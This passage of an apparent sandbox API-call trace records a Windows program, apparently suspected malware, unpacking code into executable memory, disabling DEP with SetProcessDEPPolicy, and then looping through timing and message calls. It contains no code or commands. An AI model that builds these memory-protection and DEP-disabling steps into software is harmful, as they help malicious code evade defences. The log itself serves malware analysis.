returned 0x2635608 [0059.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x24) returned 0x26362e0 [0059.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x98) returned 0x2637020 [0059.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x34) returned 0x26370c0 [0059.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x154) returned 0x2637100 [0059.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x26320c8 [0059.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x26341e8 [0059.453] lstrlenA (lpString="VB") returned 2 [0059.453] lstrlenA (lpString="Data") returned 4 [0059.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x8) returned 0x2636310 [0059.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xd8) returned 0x2637260 [0059.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x3c) returned 0x2637340 [0059.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x1d8) returned 0x2637388 [0059.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x26320e8 [0059.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x114) returned 0x2634310 [0059.453] lstrlenA (lpString="VB") returned 2 [0059.453] lstrlenA (lpString="OLE") returned 3 [0059.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x7) returned 0x2636320 [0059.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x17c) returned 0x2637568 [0059.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x40) returned 0x26376f0 [0059.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x2f0) returned 0x2637738 [0059.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2632108 [0059.586] IMalloc:Alloc (This=0x757266bc, cb=0x64) returned 0x578ea0 [0059.586] IMalloc:Alloc (This=0x757266bc, cb=0x64) returned 0x57d630 [0059.586] IMalloc:Alloc (This=0x757266bc, cb=0x64) returned 0x57d6a0 [0059.586] IMalloc:Alloc (This=0x757266bc, cb=0x64) returned 0x57d710 [0059.586] IMalloc:Alloc (This=0x757266bc, cb=0xc) returned 0x57cc20 [0059.586] IMalloc:Alloc (This=0x757266bc, cb=0x68) returned 0x57d780 [0059.586] IMalloc:GetSize (This=0x757266bc, pv=0x57d780) returned 0x68 [0059.586] IMalloc:Alloc (This=0x757266bc, cb=0x20) returned 0x5797d0 [0059.599] GetCurrentThreadId () returned 0xa48 [0059.599] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x54) returned 0x2637a30 [0059.599] GetCurrentThreadId () returned 0xa48 [0059.599] IMalloc:Alloc (This=0x757266bc, cb=0x1c) returned 0x5797f8 [0059.599] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x104) returned 0x2637a90 [0059.599] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x6f8) returned 0x2637ba0 [0059.599] VirtualProtect (in: lpAddress=0x210000, dwSize=0x6000, flNewProtect=0x4, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x20) returned 1 [0059.599] GetCurrentProcess () returned 0xffffffff [0059.599] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x210000, dwSize=0x6000) returned 1 [0059.599] VirtualAlloc (lpAddress=0x210000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0059.600] VirtualAlloc (lpAddress=0x210000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0059.600] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xd4) returned 0x26382a0 [0059.600] VirtualAlloc (lpAddress=0x210000, dwSize=0x9000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0059.600] VirtualAlloc (lpAddress=0x210000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0059.600] VirtualProtect (in: lpAddress=0x210000, dwSize=0xa000, flNewProtect=0x20, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x4) returned 1 [0059.603] GetCurrentProcess () returned 0xffffffff [0059.603] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x210000, dwSize=0xa000) returned 1 [0059.603] GetCurrentThreadId () returned 0xa48 [0059.603] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x23ec) returned 0x2638380 [0059.614] GetCurrentThreadId () returned 0xa48 [0059.614] SetWindowTextA (hWnd=0x50122, lpString="zaWEBis1810") returned 1 [0059.614] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0xc, wParam=0x0, lParam=0x18fd6c) returned 0x1 [0059.614] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fd54 | out: phkResult=0x18fd54*=0x0) returned 0x2 [0059.614] SetErrorMode (uMode=0x8001) returned 0x8001 [0059.614] LoadLibraryA (lpLibFileName="c:\\windows\\system32\\kernel32") returned 0x76c20000 [0059.615] SetErrorMode (uMode=0x8001) returned 0x8001 [0059.615] GetProcAddress (hModule=0x76c20000, lpProcName="SleepEx") returned 0x76c31215 [0059.615] SleepEx (dwMilliseconds=0x7d0, bAlertable=0) returned 0x0 [0061.820] GetLastError () returned 0x0 [0061.820] SetErrorMode (uMode=0x8001) returned 0x8001 [0061.821] LoadLibraryA (lpLibFileName="c:\\windows\\system32\\kernel32") returned 0x76c20000 [0061.821] SetErrorMode (uMode=0x8001) returned 0x8001 [0061.821] GetProcAddress (hModule=0x76c20000, lpProcName="SetProcessDEPPolicy") returned 0x76c4eb9a [0061.822] SetProcessDEPPolicy (dwFlags=0x0) returned 1 [0061.822] GetLastError () returned 0x0 [0061.863] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0061.867] GetLastError () returned 0x0 [0062.149] GetCurrentProcessId () returned 0xa44 [0062.149] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.149] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.150] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.248] GetTickCount () returned 0x1c1d7 [0062.248] GetTickCount () returned 0x1c1d7 [0062.301] GetTickCount () returned 0x1c206 [0062.315] CoFreeUnusedLibraries () [0062.315] GetTickCount () returned 0x1c216 [0062.315] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.315] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.315] GetTickCount () returned 0x1c216 [0062.317] Sleep (dwMilliseconds=0x0) [0062.319] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.335] GetLastError () returned 0x0 [0062.335] GetCurrentProcessId () returned 0xa44 [0062.335] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.335] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.335] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.335] GetTickCount () returned 0x1c235 [0062.335] GetTickCount () returned 0x1c235 [0062.335] GetTickCount () returned 0x1c235 [0062.335] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.335] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.335] GetTickCount () returned 0x1c235 [0062.336] Sleep (dwMilliseconds=0x0) [0062.350] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.366] GetLastError () returned 0x0 [0062.366] GetCurrentProcessId () returned 0xa44 [0062.366] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.366] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.366] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.366] GetTickCount () returned 0x1c254 [0062.366] GetTickCount () returned 0x1c254 [0062.366] GetTickCount () returned 0x1c254 [0062.366] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.366] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.366] GetTickCount () returned 0x1c254 [0062.366] Sleep (dwMilliseconds=0x0) [0062.382] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.413] GetLastError () returned 0x0 [0062.413] GetCurrentProcessId () returned 0xa44 [0062.413] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.413] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.413] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.413] GetTickCount () returned 0x1c283 [0062.413] GetTickCount () returned 0x1c283 [0062.413] GetTickCount () returned 0x1c283 [0062.413] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.413] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.413] GetTickCount () returned 0x1c283 [0062.413] Sleep (dwMilliseconds=0x0) [0062.428] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.444] GetLastError () returned 0x0 [0062.444] GetCurrentProcessId () returned 0xa44 [0062.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.444] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.444] GetTickCount () returned 0x1c2a2 [0062.444] GetTickCount () returned 0x1c2a2 [0062.445] GetTickCount () returned 0x1c2a2 [0062.445] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.445] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.445] GetTickCount () returned 0x1c2a2 [0062.445] Sleep (dwMilliseconds=0x0) [0062.475] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.491] GetLastError () returned 0x0 [0062.491] GetCurrentProcessId () returned 0xa44 [0062.491] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.491] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.491] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.491] GetTickCount () returned 0x1c2d1 [0062.491] GetTickCount () returned 0x1c2d1 [0062.491] GetTickCount () returned 0x1c2d1 [0062.491] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.491] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.491] GetTickCount () returned 0x1c2d1 [0062.491] Sleep (dwMilliseconds=0x0) [0062.506] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.522] GetLastError () returned 0x0 [0062.522] GetCurrentProcessId () returned 0xa44 [0062.522] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.522] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.522] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.522] GetTickCount () returned 0x1c2f0 [0062.522] GetTickCount () returned 0x1c2f0 [0062.522] GetTickCount () returned 0x1c2f0 [0062.522] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.522] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.522] GetTickCount () returned 0x1c2f0 [0062.523] Sleep (dwMilliseconds=0x0) [0062.539] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.540] GetLastError () returned 0x0 [0062.540] GetCurrentProcessId () returned 0xa44 [0062.540] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.540] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.540] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.540] GetTickCount () returned 0x1c300 [0062.540] GetTickCount () returned 0x1c300 [0062.540] GetTickCount () returned 0x1c300 [0062.540] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.540] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.540] GetTickCount () returned 0x1c300 [0062.540] Sleep (dwMilliseconds=0x0) [0062.553] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.569] GetLastError () returned 0x0 [0062.569] GetCurrentProcessId () returned 0xa44 [0062.569] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.569] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.569] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.569] GetTickCount () returned 0x1c31f [0062.569] GetTickCount () returned 0x1c31f [0062.569] GetTickCount () returned 0x1c31f [0062.569] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.569] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.569] GetTickCount () returned 0x1c31f [0062.569] Sleep (dwMilliseconds=0x0) [0062.570] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.572] GetLastError () returned 0x0 [0062.572] GetCurrentProcessId () returned 0xa44 [0062.572] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.572] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.572] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.572] GetTickCount () returned 0x1c31f [0062.572] GetTickCount () returned 0x1c31f [0062.572] GetTickCount () returned 0x1c31f [0062.572] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.573] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.573] GetTickCount () returned 0x1c31f [0062.573] Sleep (dwMilliseconds=0x0) [0062.573] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.576] GetLastError () returned 0x0 [0062.576] GetCurrentProcessId () returned 0xa44 [0062.576] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.576] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.576] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.576] GetTickCount () returned 0x1c31f [0062.576] GetTickCount () returned 0x1c31f [0062.576] GetTickCount () returned 0x1c31f [0062.576] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.576] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.576] GetTickCount () returned 0x1c31f [0062.577] Sleep (dwMilliseconds=0x0) [0062.581] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.582] GetLastError () returned 0x0 [0062.582] GetCurrentProcessId () returned 0xa44 [0062.582] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.582] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.582] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.582] GetTickCount () returned 0x1c31f [0062.582] GetTickCount () returned 0x1c31f [0062.582] GetTickCount () returned 0x1c31f [0062.582] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.582] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.582] GetTickCount () returned 0x1c31f [0062.582] Sleep (dwMilliseconds=0x0) [0062.583] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.583] GetLastError () returned 0x0 [0062.583] GetCurrentProcessId () returned 0xa44 [0062.583] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.583] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.583] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.583] GetTickCount () returned 0x1c31f [0062.583] GetTickCount () returned 0x1c31f [0062.583] GetTickCount () returned 0x1c31f [0062.583] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.583] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.583] GetTickCount () returned 0x1c31f [0062.583] Sleep (dwMilliseconds=0x0) [0062.584] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.586] GetLastError () returned 0x0 [0062.587] GetCurrentProcessId () returned 0xa44 [0062.587] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.587] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.587] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.587] GetTickCount () returned 0x1c32f [0062.587] GetTickCount () returned 0x1c32f [0062.587] GetTickCount () returned 0x1c32f [0062.587] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.587] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.587] GetTickCount () returned 0x1c32f [0062.587] Sleep (dwMilliseconds=0x0) [0062.600] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.616] GetLastError () returned 0x0 [0062.616] GetCurrentProcessId () returned 0xa44 [0062.616] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.616] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.616] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.616] GetTickCount () returned 0x1c34e [0062.616] GetTickCount () returned 0x1c34e [0062.616] GetTickCount () returned 0x1c34e [0062.616] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.616] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.616] GetTickCount () returned 0x1c34e [0062.616] Sleep (dwMilliseconds=0x0) [0062.631] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.637] GetLastError () returned 0x0 [0062.638] GetCurrentProcessId () returned 0xa44 [0062.638] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.638] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.638] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.638] GetTickCount () returned 0x1c35d [0062.638] GetTickCount () returned 0x1c35d [0062.638] GetTickCount () returned 0x1c35d [0062.638] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.638] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.638] GetTickCount () returned 0x1c35d [0062.638] Sleep (dwMilliseconds=0x0) [0062.663] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.678] GetLastError () returned 0x0 [0062.678] GetCurrentProcessId () returned 0xa44 [0062.678] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.678] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.678] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.678] GetTickCount () returned 0x1c38c [0062.678] GetTickCount () returned 0x1c38c [0062.678] GetTickCount () returned 0x1c38c [0062.678] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.678] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.678] GetTickCount () returned 0x1c38c [0062.679] Sleep (dwMilliseconds=0x0) [0062.694] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.709] GetLastError () returned 0x0 [0062.709] GetCurrentProcessId () returned 0xa44 [0062.709] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.710] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.710] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.710] GetTickCount () returned 0x1c3ab [0062.710] GetTickCount () returned 0x1c3ab [0062.710] GetTickCount () returned 0x1c3ab [0062.710] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.710] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.710] GetTickCount () returned 0x1c3ab [0062.710] Sleep (dwMilliseconds=0x0) [0062.712] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.712] GetLastError () returned 0x0 [0062.712] GetCurrentProcessId () returned 0xa44 [0062.712] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.712] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.713] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.713] GetTickCount () returned 0x1c3ab [0062.713] GetTickCount () returned 0x1c3ab [0062.713] GetTickCount () returned 0x1c3ab [0062.713] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.713] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.713] GetTickCount () returned 0x1c3ab [0062.713] Sleep (dwMilliseconds=0x0) [0062.721] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.724] GetLastError () returned 0x0 [0062.724] GetCurrentProcessId () returned 0xa44 [0062.724] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.724] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.724] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.724] GetTickCount () returned 0x1c3ab [0062.724] GetTickCount () returned 0x1c3ab [0062.724] GetTickCount () returned 0x1c3ab [0062.724] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.724] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.724] GetTickCount () returned 0x1c3ab [0062.724] Sleep (dwMilliseconds=0x0) [0062.725] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.725] GetLastError () returned 0x0 [0062.725] GetCurrentProcessId () returned 0xa44 [0062.725] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.725] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.725] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.725] GetTickCount () returned 0x1c3bb [0062.725] GetTickCount () returned 0x1c3bb [0062.725] GetTickCount () returned 0x1c3bb [0062.725] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.725] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.725] GetTickCount () returned 0x1c3bb [0062.726] Sleep (dwMilliseconds=0x0) [0062.740] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.747] GetLastError () returned 0x0 [0062.747] GetCurrentProcessId () returned 0xa44 [0062.747] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.747] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.747] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.747] GetTickCount () returned 0x1c3cb [0062.747] GetTickCount () returned 0x1c3cb [0062.747] GetTickCount () returned 0x1c3cb [0062.747] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.747] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.747] GetTickCount () returned 0x1c3cb [0062.747] Sleep (dwMilliseconds=0x0) [0062.756] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.787] GetLastError () returned 0x0 [0062.788] GetCurrentProcessId () returned 0xa44 [0062.788] 